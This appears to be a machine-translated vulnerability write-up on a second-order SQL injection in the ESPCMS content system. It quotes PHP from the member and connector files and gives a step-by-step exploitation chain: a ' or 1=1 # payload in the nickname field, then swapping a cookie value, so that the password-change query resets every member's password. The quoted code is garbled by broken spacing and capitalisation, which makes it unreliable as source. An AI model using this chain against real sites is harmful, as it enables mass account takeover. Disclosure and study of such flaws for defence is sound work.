Espcms second injection

1: use $ alias second injection to control SQL

User nickname $ alias is not filtered out from the database

Interface/member. php

$ Db_ SQL = "SELECT * FROM $ db_table WHERE $ db_where"; $ rsMember = $ this-> db-> fetch_first ($ db_ SQL); if (! $ RsMember) {....................................... ........... $ this-> fun-> setcookie ('ecisp _ member_info ', $ this-> fun-> eccode ("$ memberread [userid] | $ memberread [alias] | $ memberread [integral] | $ memberread [mcid] | $ memberread [email] | $ memberread [lastip] | $ ipadd | ". md5 ($ _ SERVER ['HTTP _ USER_AGENT ']). '| '. md5 (admin_ClassURL), 'encoding', db_pscode); // if no addcslashes is found, secondary injection can be performed.

Although cookie encryption cannot be reversed, you can control $ alias to generate some SQL statements for injection.

2: $ this-> ec_member_username Injection

Public \ class_connector.php File

$this->ec_member_username = $this->fun->eccode($this->fun->accept('ecisp_member_username', 'C'), 'DECODE', db_pscode);

$ This-> ec_member_username uses 1 to Control SQL statements (ignore gpc and ignore single quotes)

Find a place to call $ this-> ec_member_username

For example, in the interface \ membermain. php file, change the password.

 

$db_where = "userid=$this->ec_member_username_id AND username='$this->ec_member_username' AND password='$oldpassword'";             $db_sql = "SELECT * FROM $db_table WHERE $db_where";             $rsMember = $this->db->fetch_first($db_sql);              if (!$rsMember) {                 $linkURL = $this->mlink['memedit_password'];                 $this->callmessage($this->lng['password_input_err'], $linkURL, $this->lng['gobackbotton']);             } else {                 $db_set = "password='$password'";         $this->db->query('UPDATE ' . $db_table . ' SET ' . $db_set . ' WHERE ' . $db_where);

$ This-> ec_member_username can be called for injection.

3. Injection and Utilization

After analyzing 1 or 2 complete injection attacks

Login => Edit information (write injection payload) => exit => login => set cookie (ec_member_username = ecisp_member_info) => Change Password => SQL Injection

For example, I want to change the password of all members.

Enter 'or 1 = 1 # In the nickname field of the editing document and log on again to modify the ec_member_username value in the cookie to ecisp_member_info value.



 

The new and old passwords should not be the same. At this time, the SQL statement is:

 

UPDATE espcms_member SET password='99754106633f94d350db34d548d6091a' WHERE userid=1 AND username='1|' or 1=1 #|0|1|fuckss@163.com|2130706433|2130706433|fed0b5cf0dbbcab3431bf3bb8fe88349|1002de5fc95a1b716a2e04ab8d78bf76' AND password='1223b8c30a347321299611f873b449ad'

Close